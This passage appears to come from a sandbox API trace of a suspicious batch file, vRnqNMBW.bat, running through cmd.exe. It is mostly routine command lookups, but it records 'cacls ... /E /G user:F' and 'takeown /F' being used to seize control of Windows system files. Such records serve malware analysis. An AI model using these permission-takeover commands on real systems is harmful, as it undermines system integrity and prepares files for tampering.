(_String1="cacls", _String2="EXIT") returned -2 [0301.191] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0301.191] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0301.191] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0301.191] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0301.191] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0301.191] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0301.191] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0301.191] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0301.191] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0301.191] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0301.191] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0301.191] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0301.191] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0301.191] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0301.191] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0301.192] SetErrorMode (uMode=0x0) returned 0x0 [0301.192] SetErrorMode (uMode=0x1) returned 0x0 [0301.192] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x103be98, lpFilePart=0xeef4bc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeef4bc*="Desktop") returned 0x1d [0301.192] SetErrorMode (uMode=0x0) returned 0x1 [0301.192] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.192] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.193] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.193] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.193] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.194] GetLastError () returned 0x2 [0301.194] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.194] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.194] GetLastError () returned 0x2 [0301.194] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.194] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0x1030b68 [0301.194] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.194] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0xffffffff [0301.194] GetLastError () returned 0x2 [0301.195] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xeef248, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeef248) returned 0x1030b68 [0301.195] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.195] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.195] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.195] GetConsoleTitleW (in: lpConsoleTitle=0xeef290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.243] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0301.243] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0301.243] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0301.243] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0301.243] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0301.243] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0301.243] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0301.243] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0301.243] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0301.243] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0301.243] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0301.243] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0301.244] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0301.244] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0301.244] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0301.244] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0301.244] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0301.244] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0301.244] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0301.244] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0301.244] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0301.244] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0301.244] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0301.244] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0301.244] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0301.244] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0301.244] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0301.244] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0301.244] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0301.244] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0301.244] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0301.244] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0301.244] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0301.244] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0301.244] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0301.244] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0301.244] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0301.244] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0301.244] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0301.244] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0301.244] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0301.244] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0301.245] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0301.245] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0301.245] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0301.245] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0301.245] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0301.245] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0301.245] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0301.245] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0301.245] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0301.245] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0301.245] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0301.245] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0301.245] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0301.245] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0301.245] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0301.245] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0301.245] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0301.245] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0301.245] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0301.245] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0301.245] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0301.245] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0301.245] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0301.245] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0301.245] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0301.245] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0301.245] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0301.245] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0301.245] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0301.245] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0301.245] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0301.245] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0301.245] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0301.245] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0301.245] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0301.245] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0301.245] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0301.245] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0301.245] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0301.245] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0301.245] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0301.245] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0301.245] _wcsicmp (_String1="cacls", _String2="FOR") returned -3 [0301.245] _wcsicmp (_String1="cacls", _String2="IF") returned -6 [0301.245] _wcsicmp (_String1="cacls", _String2="REM") returned -15 [0301.245] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0301.246] SetErrorMode (uMode=0x0) returned 0x0 [0301.246] SetErrorMode (uMode=0x1) returned 0x0 [0301.247] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x103c518, lpFilePart=0xeeed9c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xeeed9c*="Desktop") returned 0x1d [0301.247] SetErrorMode (uMode=0x0) returned 0x1 [0301.247] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0301.247] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0301.247] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0301.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.248] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.248] GetLastError () returned 0x2 [0301.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.248] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.248] GetLastError () returned 0x2 [0301.248] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0301.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0x1030b68 [0301.248] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0xffffffff [0301.248] GetLastError () returned 0x2 [0301.248] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xeeeb28, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xeeeb28) returned 0x1030b68 [0301.249] FindClose (in: hFindFile=0x1030b68 | out: hFindFile=0x1030b68) returned 1 [0301.249] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0301.249] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0301.249] GetConsoleTitleW (in: lpConsoleTitle=0xeef01c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0301.311] InitializeProcThreadAttributeList (in: lpAttributeList=0xeeef48, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xeeef2c | out: lpAttributeList=0xeeef48, lpSize=0xeeef2c) returned 1 [0301.311] UpdateProcThreadAttribute (in: lpAttributeList=0xeeef48, dwFlags=0x0, Attribute=0x60001, lpValue=0xeeef34, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xeeef48, lpPreviousValue=0x0) returned 1 [0301.311] GetStartupInfoW (in: lpStartupInfo=0xeeef80 | out: lpStartupInfo=0xeeef80*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.311] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0301.312] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0301.312] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0301.313] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xeeeed0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xeeef1c | out: lpCommandLine="cacls \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xeeef1c*(hProcess=0xb8, hThread=0xb0, dwProcessId=0xf14, dwThreadId=0x388)) returned 1 [0301.320] CloseHandle (hObject=0xb0) returned 1 [0301.320] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0301.320] GetEnvironmentStringsW () returned 0x1039df8* [0301.320] FreeEnvironmentStringsA (penv="=") returned 1 [0301.320] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0301.443] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xeeeeb4 | out: lpExitCode=0xeeeeb4*=0x0) returned 1 [0301.443] CloseHandle (hObject=0xb8) returned 1 [0301.443] _vsnwprintf (in: _Buffer=0xeeef9c, _BufferCount=0x13, _Format="%08X", _ArgList=0xeeeebc | out: _Buffer="00000000") returned 8 [0301.443] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0301.443] GetEnvironmentStringsW () returned 0x103e310* [0301.443] FreeEnvironmentStringsA (penv="=") returned 1 [0301.443] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0301.443] GetEnvironmentStringsW () returned 0x103e310* [0301.443] FreeEnvironmentStringsA (penv="=") returned 1 [0301.443] DeleteProcThreadAttributeList (in: lpAttributeList=0xeeef48 | out: lpAttributeList=0xeeef48) [0301.443] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.443] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0301.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.464] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0301.464] _get_osfhandle (_FileHandle=0) returned 0x38 [0301.464] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0301.464] SetConsoleInputExeNameW () returned 0x1 [0301.465] GetConsoleOutputCP () returned 0x1b5 [0301.465] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0301.465] SetThreadUILanguage (LangId=0x0) returned 0x409 [0301.465] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xeef6dc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0301.465] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0301.465] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.465] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.466] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.466] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0301.466] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xeef6ac, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xeef6ac*=0xc2, lpOverlapped=0x0) returned 1 [0301.466] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0301.466] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0301.466] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.466] GetFileType (hFile=0xb8) returned 0x1 [0301.466] _get_osfhandle (_FileHandle=3) returned 0xb8 [0301.466] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0301.466] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0301.466] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0301.466] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0301.466] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0301.466] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0301.466] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0301.467] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0301.467] _tell (_FileHandle=3) returned 47 [0301.467] _close (_FileHandle=3) returned 0 [0301.468] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xeef470 | out: _Buffer="\r\n") returned 2 [0301.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.468] GetFileType (hFile=0x3c) returned 0x2 [0301.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.468] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef448 | out: lpMode=0xeef448) returned 1 [0301.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.468] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xeef460, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef460*=0x2) returned 1 [0301.468] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0301.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0301.468] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xeef46c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0301.468] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xeef46c | out: _Buffer=">") returned 1 [0301.468] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.468] GetFileType (hFile=0x3c) returned 0x2 [0301.468] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.468] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef44c | out: lpMode=0xeef44c) returned 1 [0301.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.469] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xeef464, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xeef464*=0x1e) returned 1 [0301.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.469] GetFileType (hFile=0x3c) returned 0x2 [0301.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.469] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6ec | out: lpMode=0xeef6ec) returned 1 [0301.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.469] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x10378b8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xeef704, lpReserved=0x0 | out: lpBuffer=0x10378b8*, lpNumberOfCharsWritten=0xeef704*=0x7) returned 1 [0301.469] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xeef70c | out: _Buffer=" /F \"C:\\Program Files\\Windows Journal\\en-US\\NBMapTIP.dll.mui\" ") returned 62 [0301.469] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.469] GetFileType (hFile=0x3c) returned 0x2 [0301.469] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.469] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6e4 | out: lpMode=0xeef6e4) returned 1 [0301.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.470] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x3e, lpNumberOfCharsWritten=0xeef6fc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef6fc*=0x3e) returned 1 [0301.470] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xeef720 | out: _Buffer="\r\n") returned 2 [0301.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.470] GetFileType (hFile=0x3c) returned 0x2 [0301.470] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0301.470] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xeef6f8 | out: lpMode=0xeef6f8) returned 1 [0301.470] _get_osfhandle (_FileHandle=1) returned 0x3c [0301.470] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xeef710, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xeef710*=0x2) returned 1 [0301.470] _wcsicmp 